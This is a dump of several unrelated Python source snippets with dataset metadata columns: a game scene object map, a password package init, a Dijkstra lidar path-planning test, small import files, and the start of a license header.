'1164766305.45sdnaik': '["Objects"]["1164135492.81dzlu"]["Objects"]["1164766305.45sdnaik"]', '1168745928.39WDIG': '["Objects"]["1164135492.81dzlu"]["Objects"]["1168745928.39WDIG"]', '1172172361.37kmuller': '["Objects"]["1164135492.81dzlu"]["Objects"]["1172172361.37kmuller"]', '1172208953.16sdnaik': '["Objects"]["1164135492.81dzlu"]["Objects"]["1172208953.16sdnaik"]', '1172208953.17sdnaik': '["Objects"]["1164135492.81dzlu"]["Objects"]["1172208953.16sdnaik"]["Objects"]["1172208953.17sdnaik"]', '1172208953.19sdnaik': '["Objects"]["1164135492.81dzlu"]["Objects"]["1172208953.16sdnaik"]["Objects"]["1172208953.19sdnaik"]', '1172209006.11sdnaik': '["Objects"]["1164135492.81dzlu"]["Objects"]["1172209006.11sdnaik"]', '1172209006.14sdnaik': '["Objects"]["1164135492.81dzlu"]["Objects"]["1172209006.11sdnaik"]["Objects"]["1172209006.14sdnaik"]', '1179265792.0dxschafe0': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179265792.0dxschafe0"]', '1179265792.0dxschafe1': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179265792.0dxschafe1"]', '1179265792.0dxschafe2': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179265792.0dxschafe2"]', '1179265792.0dxschafe3': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179265792.0dxschafe3"]', '1179265920.0dxschafe': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179265920.0dxschafe"]', '1179265920.0dxschafe0': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179265920.0dxschafe0"]', '1179265920.0dxschafe1': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179265920.0dxschafe1"]', '1179265920.0dxschafe2': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179265920.0dxschafe2"]', '1179265920.0dxschafe3': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179265920.0dxschafe3"]', '1179265920.0dxschafe4': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179265920.0dxschafe4"]', '1179265920.0dxschafe5': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179265920.0dxschafe5"]', '1179266048.0dxschafe': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179266048.0dxschafe"]', '1179266048.0dxschafe0': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179266048.0dxschafe0"]', '1179266048.0dxschafe1': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179266048.0dxschafe1"]', '1179266048.0dxschafe2': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179266048.0dxschafe2"]', '1179266048.0dxschafe3': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179266048.0dxschafe3"]', '1179266176.0dxschafe': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179266176.0dxschafe"]', '1179266176.0dxschafe0': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179266176.0dxschafe0"]', '1179288192.0JB0': '["Objects"]["1164135492.81dzlu"]["Objects"]["1179288192.0JB0"]', '1184890880.0dxschafe0': '["Objects"]["1164135492.81dzlu"]["Objects"]["1184890880.0dxschafe0"]', '1184890880.0dxschafe1': '["Objects"]["1164135492.81dzlu"]["Objects"]["1184890880.0dxschafe1"]', '1184891008.0dxschafe': '["Objects"]["1164135492.81dzlu"]["Objects"]["1184891008.0dxschafe"]', '1184891008.0dxschafe0': '["Objects"]["1164135492.81dzlu"]["Objects"]["1184891008.0dxschafe0"]', '1184891008.0dxschafe1': '["Objects"]["1164135492.81dzlu"]["Objects"]["1184891008.0dxschafe1"]', '1184891136.0dxschafe': '["Objects"]["1164135492.81dzlu"]["Objects"]["1184891136.0dxschafe"]', '1189100537.84kmuller': '["Objects"]["1164135492.81dzlu"]["Objects"]["1189100537.84kmuller"]', '1189100602.12kmuller': '["Objects"]["1164135492.81dzlu"]["Objects"]["1189100602.12kmuller"]', '1189100641.06kmuller': '["Objects"]["1164135492.81dzlu"]["Objects"]["1189100641.06kmuller"]', '1189100678.54kmuller': '["Objects"]["1164135492.81dzlu"]["Objects"]["1189100678.54kmuller"]', '1189100725.93kmuller': '["Objects"]["1164135492.81dzlu"]["Objects"]["1189100725.93kmuller"]', '1189100753.31kmuller': '["Objects"]["1164135492.81dzlu"]["Objects"]["1189100753.31kmuller"]', '1189101604.12kmuller': '["Objects"]["1164135492.81dzlu"]["Objects"]["1189101604.12kmuller"]', '1189101641.11kmuller': '["Objects"]["1164135492.81dzlu"]["Objects"]["1189101641.11kmuller"]', '1189101693.67kmuller': '["Objects"]["1164135492.81dzlu"]["Objects"]["1189101693.67kmuller"]', '1193357312.0dxschafe': '["Objects"]["1164135492.81dzlu"]["Objects"]["1193357312.0dxschafe"]', '1193357312.0dxschafe0': '["Objects"]["1164135492.81dzlu"]["Objects"]["1193357312.0dxschafe0"]', '1193357312.0dxschafe1': '["Objects"]["1164135492.81dzlu"]["Objects"]["1193357312.0dxschafe1"]', '1193357312.0dxschafe2': '["Objects"]["1164135492.81dzlu"]["Objects"]["1193357312.0dxschafe2"]', '1193357312.0dxschafe3': '["Objects"]["1164135492.81dzlu"]["Objects"]["1193357312.0dxschafe3"]', '1193357312.0dxschafe4': '["Objects"]["1164135492.81dzlu"]["Objects"]["1193357312.0dxschafe4"]', '1193357312.0dxschafe5': '["Objects"]["1164135492.81dzlu"]["Objects"]["1193357312.0dxschafe5"]', '1193357312.0dxschafe6': '["Objects"]["1164135492.81dzlu"]["Objects"]["1193357312.0dxschafe6"]', '1193357312.0dxschafe7': '["Objects"]["1164135492.81dzlu"]["Objects"]["1193357312.0dxschafe7"]', '1193357440.0dxschafe': '["Objects"]["1164135492.81dzlu"]["Objects"]["1193357440.0dxschafe"]', '1193357440.0dxschafe0': '["Objects"]["1164135492.81dzlu"]["Objects"]["1193357440.0dxschafe0"]', '1193357440.0dxschafe1': '["Objects"]["1164135492.81dzlu"]["Objects"]["1193357440.0dxschafe1"]', '1193357440.0dxschafe2': '["Objects"]["1164135492.81dzlu"]["Objects"]["1193357440.0dxschafe2"]', '1245890725.88piwanow': '["Objects"]["1164135492.81dzlu"]["Objects"]["1245890725.88piwanow"]', '1245890800.17piwanow': '["Objects"]["1164135492.81dzlu"]["Objects"]["1245890800.17piwanow"]', '1245890808.98piwanow': '["Objects"]["1164135492.81dzlu"]["Objects"]["1245890808.98piwanow"]', '1245890842.97piwanow': '["Objects"]["1164135492.81dzlu"]["Objects"]["1245890842.97piwanow"]', '1245890893.36piwanow': '["Objects"]["1164135492.81dzlu"]["Objects"]["1245890893.36piwanow"]', '1245890966.97piwanow': '["Objects"]["1164135492.81dzlu"]["Objects"]["1245890966.97piwanow"]', '1245890983.39piwanow': '["Objects"]["1164135492.81dzlu"]["Objects"]["1245890983.39piwanow"]', '1245890987.89piwanow': '["Objects"]["1164135492.81dzlu"]["Objects"]["1245890987.89piwanow"]', '1257277464.2caoconno': '["Objects"]["1164135492.81dzlu"]["Objects"]["1257277464.2caoconno"]', '1257277510.51caoconno': '["Objects"]["1164135492.81dzlu"]["Objects"]["1257277510.51caoconno"]'}}
extraInfo = {'camPos': Point3(481.695, 145.91, 29.114), 'camHpr': VBase3(68.916, -10.2185, 0), 'focalLength': 1.39999997616, 'skyState': 2, 'fog': 0} | 4,772.142857 | 32,970 | 0.630385 | 4,456 | 33,405 | 4.713869 | 0.132406 | 0.029231 | 0.029707 | 0.022852 | 0.717543 | 0.619091 | 0.593287 | 0.576149 | 0.538681 | 0.53354 | 0 | 0.213622 | 0.08843 | 33,405 | 7 | 32,971 | 4,772.142857 | 0.476175 | 0.006496 | 0 | 0 | 0 | 0 | 0.569582 | 0.196239 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
8620391ba777de68e9ada42b841817036b85bde9 | 122 | py | Python | gs/profile/password/__init__.py | groupserver/gs.profile.password | 72a3b117519e02edeef4e20134f7f715034c3252 | [
"ZPL-2.1"
] | null | null | null | gs/profile/password/__init__.py | groupserver/gs.profile.password | 72a3b117519e02edeef4e20134f7f715034c3252 | [
"ZPL-2.1"
] | null | null | null | gs/profile/password/__init__.py | groupserver/gs.profile.password | 72a3b117519e02edeef4e20134f7f715034c3252 | [
"ZPL-2.1"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import absolute_import
#lint:disable
from .utils import password_set
#lint:enable
| 20.333333 | 38 | 0.762295 | 17 | 122 | 5.117647 | 0.764706 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009346 | 0.122951 | 122 | 5 | 39 | 24.4 | 0.803738 | 0.360656 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
86f78574e229091fd1a36a9d5aa68f4529c288b1 | 129 | py | Python | tests/test_models.py | semantic-systems/event_extraction | 920ae4dfb174f1aee0f368979cb90167b1c24465 | [
"Apache-2.0"
] | null | null | null | tests/test_models.py | semantic-systems/event_extraction | 920ae4dfb174f1aee0f368979cb90167b1c24465 | [
"Apache-2.0"
] | null | null | null | tests/test_models.py | semantic-systems/event_extraction | 920ae4dfb174f1aee0f368979cb90167b1c24465 | [
"Apache-2.0"
] | 1 | 2022-01-26T09:58:10.000Z | 2022-01-26T09:58:10.000Z |
def test_initialize_model(model_instance):
assert model_instance
assert len(model_instance.encoder.encoder.layer) == 2
| 21.5 | 57 | 0.782946 | 17 | 129 | 5.647059 | 0.588235 | 0.40625 | 0.395833 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009009 | 0.139535 | 129 | 5 | 58 | 25.8 | 0.855856 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.666667 | 1 | 0.333333 | false | 0 | 0 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
81177cf3dfb1463697448f5da6f6e183ebc6461a | 12,157 | py | Python | navigation/scripts/grid_based/tests/dijkstra_test.py | archit2604/Trotbot | 8ff34049b9c81fa50d29493b5669140b0f75d0d5 | [
"MIT"
] | 1 | 2020-08-04T12:00:18.000Z | 2020-08-04T12:00:18.000Z | navigation/scripts/grid_based/tests/dijkstra_test.py | archit2604/Trotbot | 8ff34049b9c81fa50d29493b5669140b0f75d0d5 | [
"MIT"
] | null | null | null | navigation/scripts/grid_based/tests/dijkstra_test.py | archit2604/Trotbot | 8ff34049b9c81fa50d29493b5669140b0f75d0d5 | [
"MIT"
] | null | null | null | #! /usr/bin/env python
import time
import sys
import os
import numpy as np
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '../../mapping')))
try:
from dijkstra import Dijkstra
from lidar_to_grid import Mapper
except:
raise ImportError("Dijkstra Could'nt be imported")
def test1():
inf = np.inf
scan =[inf, inf, inf, inf, inf, inf, inf, 3.056861639022827, 3.0252268314361572, 3.0203325748443604, 2.0132949352264404, 1.9735280275344849, 1.953012466430664, 1.9486260414123535, 1.9373271465301514, 1.9421530961990356, 1.9569212198257446, 2.002772331237793, inf, inf, inf, 0.9855800271034241, 0.9726546406745911, 0.9509224891662598, 0.9256065487861633, 0.9257093071937561, 0.922886073589325, 0.9183664917945862, 0.906120240688324, 0.8961981534957886, 0.9056581854820251, 0.9420517683029175, 0.9265859723091125, 0.9183934330940247, 0.9498110413551331, 0.9667358994483948, 1.0045623779296875, 2.442192792892456, 2.4326982498168945, 2.4553067684173584, 2.4645442962646484, 2.506408214569092, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, 1.7533923387527466, 1.71872878074646, 1.70149827003479, 1.6858848333358765, 1.6909033060073853, 1.7164965867996216, 1.7079846858978271, 1.7376644611358643, 1.785688877105713, 3.3595521450042725, 3.3191449642181396, 3.29377818107605, 3.2705166339874268, 3.2538671493530273, 3.2152647972106934, 3.2159855365753174, 3.19524884223938, 3.0854270458221436, 2.8649425506591797, 2.6712183952331543, 2.554349184036255, 2.556751251220703, 2.5452141761779785, 2.5436341762542725, 2.5213427543640137, 2.5272300243377686, 2.5183942317962646, 2.509161949157715, 2.5124869346618652, 2.4297120571136475, 2.3386430740356445, 2.2512683868408203, 2.1818249225616455, 2.103046417236328, 2.0564870834350586, 1.9878475666046143, 1.9268088340759277, 1.885642170906067, 1.8311305046081543, 1.7829922437667847, 1.7410887479782104, 1.7179292440414429, 1.65846848487854, 1.6332777738571167, 1.5900510549545288, 1.5677014589309692, 1.5201916694641113, 1.4969840049743652, 1.4841266870498657, 1.4385578632354736, 1.4428545236587524, 1.4075186252593994, 1.3866387605667114, 1.3508318662643433, 1.3370169401168823, 1.3260891437530518, 1.3067781925201416, 1.2939659357070923, 1.2805120944976807, 1.2707873582839966, 1.2281290292739868, 1.2153609991073608, 1.2014520168304443, 1.2100038528442383, 1.1812770366668701, 1.1618354320526123, 1.1519147157669067, 1.1456130743026733, 1.1571439504623413, 1.1326026916503906, 1.1386666297912598, 1.0997953414916992, 1.091562271118164, 1.1005403995513916, 1.1073905229568481, 1.075814962387085, 1.0699113607406616, 1.078955054283142, 1.0810444355010986, 1.0660544633865356, 1.0604965686798096, 1.0380046367645264, 1.0327768325805664, 1.078073501586914, 1.0491496324539185, 1.0314854383468628, 1.0256805419921875, 1.0399309396743774, 1.039351224899292, 1.0458898544311523, 1.0328317880630493, 1.0365073680877686, 1.0345937013626099, 1.0336904525756836, 1.045121431350708, 1.019679069519043, 0.9782207012176514, 0.9893175959587097, 0.9512673616409302, 0.9016335606575012, 0.8861187696456909, 0.8714970350265503, 0.8524404168128967, 0.8410521745681763, 0.8306225538253784, 0.806861162185669, 0.7750387787818909, 0.772260308265686, 0.7613915205001831, 0.7231266498565674, 0.7228431701660156, 0.7109572291374207, 0.7123162746429443, 0.6959463357925415, 0.6842755079269409, 0.6778551936149597, 0.672926127910614, 0.6455686688423157, 0.6492228507995605, 0.650477945804596, 0.6205228567123413, 0.63560950756073, 0.6331012845039368, 0.6159425973892212, 0.6135613918304443, 0.5959789752960205, 0.610405445098877, 0.5870363712310791, 0.5804761052131653, 0.6007770299911499, 0.5676383972167969, 0.5660935640335083, 0.5781680345535278, 0.5915207862854004, 0.5583205819129944, 0.5651285648345947, 0.5652458071708679, 0.5596476197242737, 0.545867919921875, 0.5507373809814453, 0.5318761467933655, 0.542111337184906, 0.540361225605011, 0.5328619480133057, 0.5332945585250854, 0.5352373123168945, 0.5453101992607117, 0.5408035516738892, 0.5488573908805847, 0.5210607647895813, 0.5293474793434143, 0.5348880290985107, 0.5456039905548096, 0.5199136734008789, 0.5178253650665283, 0.5266040563583374, 0.5523934364318848, 0.5342961549758911, 0.5384075045585632, 0.5334569215774536, 0.5281636714935303, 0.5111650228500366, 0.5428661704063416, 0.5401403903961182, 0.5570170879364014, 0.5265321731567383, 0.5520188212394714, 0.5388387441635132, 0.5361006855964661, 0.5432685613632202, 0.5588036775588989, 0.5637043118476868, 0.5593273043632507, 0.5618724226951599, 0.5681909918785095, 0.580647349357605, 0.5878729224205017, 0.567261815071106, 0.5693681240081787, 0.5898579955101013, 0.6078497171401978, 0.6051531434059143, 0.6091262102127075, 0.5822492837905884, 0.6195617318153381, 0.6141515374183655, 0.617192804813385, 0.6386907696723938, 0.6485453248023987, 0.6483967900276184, 0.6659299731254578, 0.6548660397529602, 0.6864899396896362, 0.6838104128837585, 0.6932967901229858, 0.7090590596199036, 0.7026281356811523, 0.7346917986869812, 0.7633113861083984, 0.7599661350250244, 0.7832435369491577, 0.779472291469574, 0.8087064623832703, 0.8164687752723694, 0.8538014888763428, 0.8430877923965454, 0.8757237195968628, 0.8956906199455261, 0.9206846356391907, 0.9354161024093628, 0.9733413457870483, 0.9885174036026001, 1.0486935377120972, 1.049687385559082, 1.1021144390106201, 1.1006282567977905, 1.1586135625839233, 1.2052730321884155, 1.2459439039230347, 1.302675485610962, 1.3653827905654907, 1.4164248704910278, 1.4472814798355103, 1.535380244255066, 1.532191514968872, 1.5412589311599731, 1.5219082832336426, 1.5472310781478882, 1.5644363164901733, 1.55789053440094, 1.5711780786514282, 1.5786079168319702, 1.5898356437683105, 1.600523829460144, 1.6128002405166626, 1.6159331798553467, 1.626638412475586, 1.8782384395599365, 2.235314130783081, 2.2563958168029785, 2.2954134941101074, 2.307398557662964, 2.3106799125671387, 2.351066827774048, 2.391575813293457, 2.3959853649139404, 2.430370569229126, 2.449401378631592, 2.478189468383789, 2.516754150390625, 2.5472171306610107, 2.59478759765625, 2.6314077377319336, 2.6275601387023926, 2.682375907897949, 2.7329845428466797, 2.7940165996551514, 2.8262627124786377, 2.891613245010376, 2.943937301635742, 2.9711005687713623, 3.0209319591522217, 3.1053292751312256, 1.0324296951293945, 1.0091277360916138, 1.0003530979156494, 0.9934810996055603, 0.9784740209579468, 0.9725538492202759, 0.9597940444946289, 0.9535285830497742, 0.9423716068267822, 0.9491086602210999, 0.966484010219574, 0.9733442068099976, 0.9970974326133728, 1.0060924291610718, 1.0158592462539673, 1.0913983583450317, inf, inf, inf, inf, 2.0314512252807617, 2.0178802013397217, 1.9728460311889648, 1.961500883102417, 1.9714338779449463, 1.9641704559326172, 2.0064427852630615, 2.0385403633117676, 3.066349506378174, 3.039686918258667, 3.0638043880462646, 3.07513165473938, inf, inf, inf, inf, inf, inf, inf, inf, inf]
o = Mapper()
prob_map = Mapper.main(o,scan)
d =Dijkstra()
d(prob_map , [36,36], [50,30])
print('\n ' + '-'*30 + "\n> Starting operation ...\n " + '-'*30 + '\n')
start_time = time.time()
final_path = d.find_path()
print('\n ' + '-'*30 + "\n> Time taken: {:.4} seconds.\n ".format(time.time() - start_time) + '-'*30 + '\n')
d.draw_final_graph(final_path)
def test2():
inf = np.inf
scan=[inf, inf, inf, inf, inf, inf, 2.122950792312622, 1.8218177556991577, 1.59413743019104, 1.423231601715088, 1.323502540588379, 1.3081393241882324, 1.3145588636398315, 1.3490028381347656, 1.335472822189331, 1.319705605506897, 1.3400593996047974, 1.3491653203964233, 1.3466880321502686, 1.3696467876434326, 1.3745601177215576, 1.3833107948303223, 1.3923722505569458, 1.4062138795852661, 1.3897963762283325, 1.4243078231811523, 1.4298373460769653, 1.4416676759719849, 1.450016736984253, 1.471937656402588, 1.5024218559265137, 1.4850928783416748, 1.5270593166351318, 1.5272008180618286, 1.5350757837295532, 1.5613079071044922, 1.58877432346344, 1.6090070009231567, 1.6587506532669067, 1.6668319702148438, 1.6823045015335083, 1.711564540863037, 1.7509064674377441, 1.7584381103515625, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, 2.650038242340088, 2.6445717811584473, 2.631784677505493, 2.6164636611938477, 2.6125850677490234, 2.5924696922302246, 2.5889229774475098, 2.5727877616882324, 2.5825552940368652, 2.5913491249084473, 2.5679054260253906, 2.575549840927124, 2.5961365699768066, 2.578033447265625, 2.563906669616699, 2.576000690460205, 2.586289644241333, 2.5772287845611572, 2.5811655521392822, 2.5825459957122803, 2.588222026824951, 2.5943994522094727, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, 2.9890737533569336, 2.9071550369262695, 2.8188626766204834, 2.7494678497314453, 2.67634916305542, 2.6266491413116455, 2.5653467178344727, 2.5333642959594727, 2.4661786556243896, 2.4012131690979004, 2.3687829971313477, 2.323002338409424, 2.2887566089630127, 2.2677664756774902, 2.296781539916992, 2.3500185012817383, 2.360821008682251, 2.453289031982422, 2.4872214794158936, 2.548398017883301, 2.6022679805755615, 2.6568949222564697, 2.7322375774383545, 2.7981326580047607, 2.8849222660064697, 2.9328646659851074, 3.0372416973114014, inf, inf, inf, inf, inf, 3.4685451984405518, 3.4392693042755127, 3.423564910888672, 3.389524221420288, 3.3799402713775635, 3.355445146560669, 3.335869073867798, 3.295499086380005, 3.285273551940918, 3.2675883769989014, 3.2415120601654053, 3.2439682483673096, 3.21799898147583, 3.207578659057617, 3.2076492309570312, 3.3214356899261475, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, 1.7193019390106201, 1.679825782775879, 1.650679349899292, 1.6179615259170532, 1.5983997583389282, 1.5532128810882568, 1.5364797115325928, 1.5386948585510254, 1.5013322830200195, 1.4845850467681885, 1.4534012079238892, 1.444892168045044, 1.4262295961380005, 1.4062203168869019, 1.4057549238204956, 1.3824982643127441, 1.367220163345337, 1.3536320924758911, 1.3183528184890747, 1.3393183946609497, 1.312820553779602, 1.3034974336624146, 1.2918084859848022, 1.2986373901367188, 1.2754086256027222, 1.271276831626892, 1.2715413570404053, 1.2496140003204346, 1.220840334892273, 1.259627103805542, 1.2267930507659912, 1.2130810022354126, 1.2276153564453125, 1.2212096452713013, 1.281704306602478, 1.3779208660125732, 1.5410783290863037, 1.7324031591415405, 1.9674873352050781, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, 2.966913938522339, 2.879478931427002, 2.812376022338867, 2.7323076725006104, 2.667478322982788, 2.613341808319092, 2.5557971000671387, 2.4918932914733887, 2.439162492752075, 2.3888156414031982, 2.3447256088256836, 2.304054021835327, 2.2600510120391846, 2.2221076488494873, 2.216076374053955, 2.2552261352539062, 2.31876802444458, 2.357189178466797, 2.396010398864746, 2.4466495513916016, 2.4985275268554688, 2.564828395843506, 2.634127140045166, 2.671659231185913, 2.7563955783843994, 2.829598903656006, 2.9014203548431396, 2.9869801998138428, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf, inf]
o = Mapper()
prob_map = Mapper.main(o,scan)
d =Dijkstra()
d(prob_map , [36,36], [50,30])
print('\n ' + '-'*30 + "\n> Starting operation ...\n " + '-'*30 + '\n')
start_time = time.time()
final_path = d.find_path()
print('\n ' + '-'*30 + "\n> Time taken: {:.4} seconds.\n ".format(time.time() - start_time) + '-'*30 + '\n')
d.draw_final_graph(final_path)
| 221.036364 | 6,584 | 0.795015 | 1,401 | 12,157 | 6.878658 | 0.396146 | 0.133859 | 0.189582 | 0.237833 | 0.125039 | 0.12369 | 0.121926 | 0.121511 | 0.121511 | 0.121511 | 0 | 0.743362 | 0.082997 | 12,157 | 54 | 6,585 | 225.12963 | 0.121098 | 0.001727 | 0 | 0.571429 | 0 | 0 | 0.016153 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057143 | false | 0 | 0.2 | 0 | 0.257143 | 0.114286 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
077fe718b1b70cc36ba02ab23bc4cab0434e2f20 | 60 | py | Python | package_eg_test.py | Eithandarphyo51/python-test-exercises | 85d1cbb82fc878315be46d168e5eb0f949c6ded4 | [
"MIT"
] | null | null | null | package_eg_test.py | Eithandarphyo51/python-test-exercises | 85d1cbb82fc878315be46d168e5eb0f949c6ded4 | [
"MIT"
] | null | null | null | package_eg_test.py | Eithandarphyo51/python-test-exercises | 85d1cbb82fc878315be46d168e5eb0f949c6ded4 | [
"MIT"
] | null | null | null | import package_example.ex10
package_example.ex10.convert()
| 15 | 30 | 0.85 | 8 | 60 | 6.125 | 0.625 | 0.571429 | 0.734694 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.071429 | 0.066667 | 60 | 3 | 31 | 20 | 0.803571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
079c11017a95799a4f3f1683c2402eb3e7d5f14b | 39 | py | Python | lenstools/catalog/__init__.py | asabyr/LensTools | e155d6d39361e550906cec00dbbc57686a4bca5c | [
"MIT"
] | null | null | null | lenstools/catalog/__init__.py | asabyr/LensTools | e155d6d39361e550906cec00dbbc57686a4bca5c | [
"MIT"
] | null | null | null | lenstools/catalog/__init__.py | asabyr/LensTools | e155d6d39361e550906cec00dbbc57686a4bca5c | [
"MIT"
] | null | null | null | from .shear import Catalog,ShearCatalog | 39 | 39 | 0.871795 | 5 | 39 | 6.8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 39 | 1 | 39 | 39 | 0.944444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
07a6783444323705f3964f08b5d19d01e296920a | 18 | py | Python | Lib/test/test_compiler/testcorpus/91_line_numbers3.py | diogommartins/cinder | 79103e9119cbecef3b085ccf2878f00c26e1d175 | [
"CNRI-Python-GPL-Compatible"
] | 1,886 | 2021-05-03T23:58:43.000Z | 2022-03-31T19:15:58.000Z | Lib/test/test_compiler/testcorpus/91_line_numbers3.py | diogommartins/cinder | 79103e9119cbecef3b085ccf2878f00c26e1d175 | [
"CNRI-Python-GPL-Compatible"
] | 70 | 2021-05-04T23:25:35.000Z | 2022-03-31T18:42:08.000Z | Lib/test/test_compiler/testcorpus/91_line_numbers3.py | diogommartins/cinder | 79103e9119cbecef3b085ccf2878f00c26e1d175 | [
"CNRI-Python-GPL-Compatible"
] | 52 | 2021-05-04T21:26:03.000Z | 2022-03-08T18:02:56.000Z | a = 1 + \
2 + \
4
| 4.5 | 9 | 0.222222 | 4 | 18 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 0.5 | 18 | 3 | 10 | 6 | 0.111111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
07d0f790a3a8095ca916e0b6aed5212d51f70f7f | 6,754 | py | Python | source/vsm-dashboard/vsm_dashboard/dashboards/vsm/clustermgmt/form.py | ramkrsna/virtual-storage-manager | 78125bfb4dd4d78ff96bc3274c8919003769c545 | [
"Apache-2.0"
] | 172 | 2015-01-07T08:40:17.000Z | 2019-02-18T07:01:11.000Z | source/vsm-dashboard/vsm_dashboard/dashboards/vsm/clustermgmt/form.py | ramkrsna/virtual-storage-manager | 78125bfb4dd4d78ff96bc3274c8919003769c545 | [
"Apache-2.0"
] | 83 | 2015-03-06T07:47:03.000Z | 2018-07-05T15:10:19.000Z | source/vsm-dashboard/vsm_dashboard/dashboards/vsm/clustermgmt/form.py | ramkrsna/virtual-storage-manager | 78125bfb4dd4d78ff96bc3274c8919003769c545 | [
"Apache-2.0"
] | 125 | 2015-01-05T12:22:15.000Z | 2019-02-18T07:01:39.000Z |
# Copyright 2014 Intel Corporation, All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the"License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
